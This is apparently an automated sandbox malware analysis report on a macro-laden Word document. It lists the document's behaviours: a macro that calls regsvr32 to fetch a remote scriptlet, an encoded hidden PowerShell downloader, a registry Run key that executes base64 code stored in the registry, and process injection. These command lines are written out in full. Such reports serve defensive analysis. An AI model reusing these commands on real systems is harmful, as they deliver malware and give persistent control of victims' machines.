Analysis Report

Overview

General Information

Joe Sandbox Version:	18.0.0
Analysis ID:	223569
Start time:	19:45:48
Joe Sandbox Product:	Cloud
Start date:	22.02.2017
Overall analysis duration:	0h 9m 36s
Report type:	full
Sample file name:	huuliin-tusul-offsh-20160918.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled VBA Instrumentation enabled
Detection:	MAL
Classification:	mal100.evad.expl.troj.winDOC@13/14@4/3
HCA Information:	Successful, ratio: 97% Number of executed functions: 13 Number of non-executed functions: 1
EGA Information:	Successful, ratio: 100%
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel document Simulate clicks Found new Word/Excel, stop clicking Number of clicks 71 Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, conhost.exe, WMIADAP.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe, powershell.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook

Sample tries to load a library which is not present or installed on the analysis machine, update the analysis machine

Signature Overview

Click to jump to signature section

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: www.geocities.jp

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.81:49166 -> 118.151.231.180:80

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.81:49166 -> 118.151.231.180:80

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\regsvr32.exe

Networking:

Contains functionality to download additional files from the internet

Show sources

Source: C:\Windows\System32\userinit.exe

Code function: 10_2_000613CD select,recv,send,

10_2_000613CD

Downloads compressed data via HTTP

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OK Date: Wed, 22 Feb 2017 18:46:54 GMT P3P: policyref="http://privacy.yahoo.co.jp/w3c/p3p_jp.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Last-Modified: Wed, 21 Sep 2016 14:19:25 GMT Accept-Ranges: bytes Content-Length: 16423 Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document Age: 0 Connection: keep-alive Data Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 dd fc 95 37 66 01 00 00 20 05 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /lgxpoy6/f0921-6.sct HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.geocities.jp Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /lgxpoy6/huuliin-tusul-offsh-20160918.docx HTTP/1.1 Host: www.geocities.jp Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /lgxpoy6/f0921.ps1 HTTP/1.1 Host: www.geocities.jp

Found strings which match to known social media urls

Show sources

Source: regsvr32.exe	String found in binary or memory: P3P: policyref="http://privacy.yahoo.co.jp/w3c/p3p_jp.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN C equals www.yahoo.com (Yahoo)
Source: regsvr32.exe	String found in binary or memory: P3P: policyref="http://privacy.yahoo.co.jp/w3c/p3p_jp.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN C% equals www.yahoo.com (Yahoo)
Source: regsvr32.exe, powershell.exe	String found in binary or memory: P3P: policyref="http://privacy.yahoo.co.jp/w3c/p3p_jp.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" equals www.yahoo.com (Yahoo)
Source: powershell.exe	String found in binary or memory: policyref="http://privacy.yahoo.co.jp/w3c/p3p_jp.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"H equals www.yahoo.com (Yahoo)
Source: regsvr32.exe	String found in binary or memory: ttp://privacy.yahoo.co.jp/w3c/p3p_jp.xml equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: www.geocities.jp

Urls found in memory or binary data

Show sources

Source: powershell.exe	String found in binary or memory: file://
Source: powershell.exe	String found in binary or memory: file:///
Source: WINWORD.EXE	String found in binary or memory: file:///c:
Source: regsvr32.exe	String found in binary or memory: file:///c:/users/luketaylor/appdata/local/microsoft/windows/temporary%20internet%20files/content.ie5
Source: powershell.exe	String found in binary or memory: file:///c:/windows/s8
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/pt
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/b
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/cx
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/qx
Source: WINWORD.EXE	String found in binary or memory: ftp://
Source: WINWORD.EXE, powershell.exe	String found in binary or memory: http://
Source: powershell.exe	String found in binary or memory: http://java.com/
Source: powershell.exe	String found in binary or memory: http://java.com/http://java.com/
Source: powershell.exe	String found in binary or memory: http://privacy.yahoo.co.jp/w3c/p3p_jp.xml
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter0u
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponseh
Source: powershell.exe	String found in binary or memory: http://www.geoci
Source: powershell.exe	String found in binary or memory: http://www.geocih
Source: powershell.exe	String found in binary or memory: http://www.geociti
Source: powershell.exe	String found in binary or memory: http://www.geocities.jp
Source: powershell.exe	String found in binary or memory: http://www.geocities.jp/lgxph
Source: WINWORD.EXE	String found in binary or memory: http://www.geocities.jp/lgxpoy6/f0921-6
Source: regsvr32.exe	String found in binary or memory: http://www.geocities.jp/lgxpoy6/f0921-6.sct
Source: regsvr32.exe	String found in binary or memory: http://www.geocities.jp/lgxpoy6/f0921-6.sct%
Source: regsvr32.exe	String found in binary or memory: http://www.geocities.jp/lgxpoy6/f0921-6.sctqqc:
Source: regsvr32.exe	String found in binary or memory: http://www.geocities.jp/lgxpoy6/f0921-6.sctscrobj.dll
Source: powershell.exe	String found in binary or memory: http://www.geocities.jp/lgxpoy6/f0921.ps1
Source: powershell.exe	String found in binary or memory: http://www.geocities.jp/lgxpoy6/f0921.ps1h
Source: powershell.exe	String found in binary or memory: http://www.geocities.jp/lgxpoy6/h
Source: powershell.exe	String found in binary or memory: http://www.geocities.jp/lgxpoy6/huuliin-tusul-offsh-20160918
Source: powershell.exe	String found in binary or memory: http://www.geocities.jp/lgxpoy6/huuliin-tusul-offsh-20160918.doch
Source: powershell.exe	String found in binary or memory: http://www.geocities.jp/lgxpoy6/huuliin-tusul-offsh-20160918.docx
Source: powershell.exe	String found in binary or memory: http://www.geocities.jp/lgxpoy6/huuliin-tusul-offsh-20160918.docxh
Source: WINWORD.EXE	String found in binary or memory: http://www.msnusers.comf
Source: WINWORD.EXE	String found in binary or memory: https://

HTTP GET or POST without a user agent

Show sources

Source: global traffic	HTTP traffic detected: GET /lgxpoy6/huuliin-tusul-offsh-20160918.docx HTTP/1.1 Host: www.geocities.jp Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /lgxpoy6/f0921.ps1 HTTP/1.1 Host: www.geocities.jp

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic

HTTP traffic detected: GET /lgxpoy6/f0921-6.sct HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: www.geocities.jp Connection: Keep-Alive

Detected non-DNS traffic on DNS port

Show sources

Source: global traffic

TCP traffic: 192.168.1.81:49169 -> 116.193.154.28:53

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run SecurityUpdate
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run SecurityUpdate

Creates autostart registry keys with suspicious values (likely registry only malware)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run SecurityUpdate powershell.exe -w hidden -ep Bypass -nologo -noprofile iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))

Data Obfuscation:

Registers a DLL

Show sources

Source: unknown

Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /u /s /i:http://www.geocities.jp/lgxpoy6/f0921-6.sct scrobj.dll

Document contains an embedded VBA with many string operations indicating source code obfuscation

Show sources

Source: huuliin-tusul-offsh-20160918.doc	Stream path 'Macros/VBA/ThisDocument' : High number of string operations
Source: VBA code instrumentation	OLE, VBA macro, High number of string operations: Module ThisDocument			Name: ThisDocument

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE
Source:	Binary string: mscorrc.pdb source: powershell.exe
Source:	Binary string: G:\o14\65_VC8\VBE6\legovbe\vbe7.pdb source: WINWORD.EXE

Document has a 'bytes' value indicative for goodware

Show sources

Source: huuliin-tusul-offsh-20160918.doc

Initial sample: OLE document summary bytes = 0

Binary contains paths to development resources

Show sources

Source: WINWORD.EXE

Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K

Classification label

Show sources

Source: classification engine

Classification label: mal100.evad.expl.troj.winDOC@13/14@4/3

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Windows\System32\userinit.exe

Code function: 10_2_00560000 CreateThread,AdjustTokenPrivileges,AdjustTokenPrivileges,CreateFileA,getsockname,VirtualAlloc,GetComputerNameA,VirtualAlloc,GetPriorityClass,SetPriorityClass,Sleep,Sleep,SetPriorityClass,

10_2_00560000

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\luketaylor\AppData\Roaming\Microsoft\Office\Recent\huuliin-tusul-offsh-20160918.LNK

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\LUKETA~1\AppData\Local\Temp\CVR2B5.tmp

Document contains an OLE Word Document stream indicating a Microsoft Word file

Show sources

Source: huuliin-tusul-offsh-20160918.doc

OLE indicator, Word Document stream: true

Document contains summary information with irregular field values

Show sources

Source: huuliin-tusul-offsh-20160918.doc

OLE document summary: title field not present or empty

Found command line output

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3.`h.......0....3.`......4.L\|.`......m$(.`..m*q..L\|.`@............7.`.......`..4.x.7.....P.......$(.`...`....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........p...l...............A.Uwp...............a.Uw..0.................h...........................P.........Tw........

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\huuliin-tusul-offsh-20160918.doc
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /u /s /i:http://www.geocities.jp/lgxpoy6/f0921-6.sct scrobj.dll
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ep bypass -Enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwANAAoAJABuAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AA0ACgAkAG4ALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQBbAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwANAAoAJABuAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBnAGUAbwBjAGkAdABpAGUAcwAuAGoAcAAvAGwAZwB4AHAAbwB5ADYALwBoAHUAdQBsAGkAaQBuAC0AdAB1AHMAdQBsAC0AbwBmAGYAcwBoAC0AMgAwADEANgAwADkAMQA4AC4AZABvAGMAeAAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdQB1AGwAaQBpAG4ALQB0AHUAcwB1AGwALQBvAGYAZgBzAGgALQAyADAAMQA2ADAAOQAxADgALgBkAG8AYwB4ACIAKQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdQB1AGwAaQBpAG4ALQB0AHUAcwB1AGwALQBvAGYAZgBzAGgALQAyADAAMQA2ADAAOQAxADgAL
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\LUKETA~1\AppData\Local\Temp\huuliin-tusul-offsh-20160918.docx'
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c powershell.exe -noprofile -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))
Source: unknown	Process created: C:\Windows\System32\userinit.exe userinit.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /u /s /i:http://www.geocities.jp/lgxpoy6/f0921-6.sct scrobj.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ep bypass -Enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwANAAoAJABuAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AA0ACgAkAG4ALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQBbAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwANAAoAJABuAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBnAGUAbwBjAGkAdABpAGUAcwAuAGoAcAAvAGwAZwB4AHAAbwB5ADYALwBoAHUAdQBsAGkAaQBuAC0AdAB1AHMAdQBsAC0AbwBmAGYAcwBoAC0AMgAwADEANgAwADkAMQA4AC4AZABvAGMAeAAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdQB1AGwAaQBpAG4ALQB0AHUAcwB1AGwALQBvAGYAZgBzAGgALQAyADAAMQA2ADAAOQAxADgALgBkAG8AYwB4ACIAKQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdQB1AGwAaQBpAG4ALQB0AHUAcwB1AGwALQBvAGYAZgBzAGgALQAyADAAMQA2ADAAOQAxADgAL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\LUKETA~1\AppData\Local\Temp\huuliin-tusul-offsh-20160918.docx'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c powershell.exe -noprofile -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\console').FontSecurity)))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\userinit.exe userinit.exe

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Creates mutexes

Show sources

Source: C:\Windows\System32\userinit.exe	Mutant created: \Sessions\1\BaseNamedObjects\20160509
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Document contains embedded VBA macros

Show sources

Source: huuliin-tusul-offsh-20160918.doc

OLE indicator, VBA macros: true

Reads the hosts file

Show sources

Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\userinit.exe	File read: C:\Windows\System32\drivers\etc\hosts

Tries to load missing DLLs

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: api-ms-win-appmodel-runtime-l1-1-2.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: api-ms-win-appmodel-runtime-l1-1-0.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: api-ms-win-appmodel-runtime-l1-1-2.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: api-ms-win-appmodel-runtime-l1-1-0.dll

Blacklisted process start detected (Windows program)

Show sources

Source: C:\Windows\System32\regsvr32.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ep bypass -Enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwANAAoAJABuAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AA0ACgAkAG4ALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQBbAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwANAAoAJABuAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBnAGUAbwBjAGkAdABpAGUAcwAuAGoAcAAvAGwAZwB4AHAAbwB5ADYALwBoAHUAdQBsAGkAaQBuAC0AdAB1AHMAdQBsAC0AbwBmAGYAcwBoAC0AMgAwADEANgAwADkAMQA4AC4AZABvAGMAeAAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdQB1AGwAaQBpAG4ALQB0AHUAcwB1AGwALQBvAGYAZgBzAGgALQAyADAAMQA2ADAAOQAxADgALgBkAG8AYwB4ACIAKQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdQB1AGwAaQBpAG4ALQB0AHUAcwB1AGwALQBvAGYAZgBzAGgALQAyADAAMQA2ADAAOQAxADgAL

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: huuliin-tusul-offsh-20160918.doc	OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open			Name: Document_Open

Document contains an embedded VBA macro which may execute processes

Show sources

Source: huuliin-tusul-offsh-20160918.doc	OLE, VBA macro line: Call Shell(command, vbHide)
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Execute, API Shell("regsvr32.exe /u /s /i:http://www.geocities.jp/lgxpoy6/f0921-6.sct scrobj.dll",0:Long)			Name: Execute

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: userinit.exe	Binary or memory string: Progman
Source: userinit.exe	Binary or memory string: Program Manager
Source: userinit.exe	Binary or memory string: Shell_TrayWnd

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ep bypass -Enc JABuAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwANAAoAJABuAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AA0ACgAkAG4ALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQBbAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwANAAoAJABuAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBnAGUAbwBjAGkAdABpAGUAcwAuAGoAcAAvAGwAZwB4AHAAbwB5ADYALwBoAHUAdQBsAGkAaQBuAC0AdAB1AHMAdQBsAC0AbwBmAGYAcwBoAC0AMgAwADEANgAwADkAMQA4AC4AZABvAGMAeAAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdQB1AGwAaQBpAG4ALQB0AHUAcwB1AGwALQBvAGYAZgBzAGgALQAyADAAMQA2ADAAOQAxADgALgBkAG8AYwB4ACIAKQA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAGUAbgB2ADoAdABlAG0AcABcAGgAdQB1AGwAaQBpAG4ALQB0AHUAcwB1AGwALQBvAGYAZgBzAGgALQAyADAAMQA2ADAAOQAxADgAL
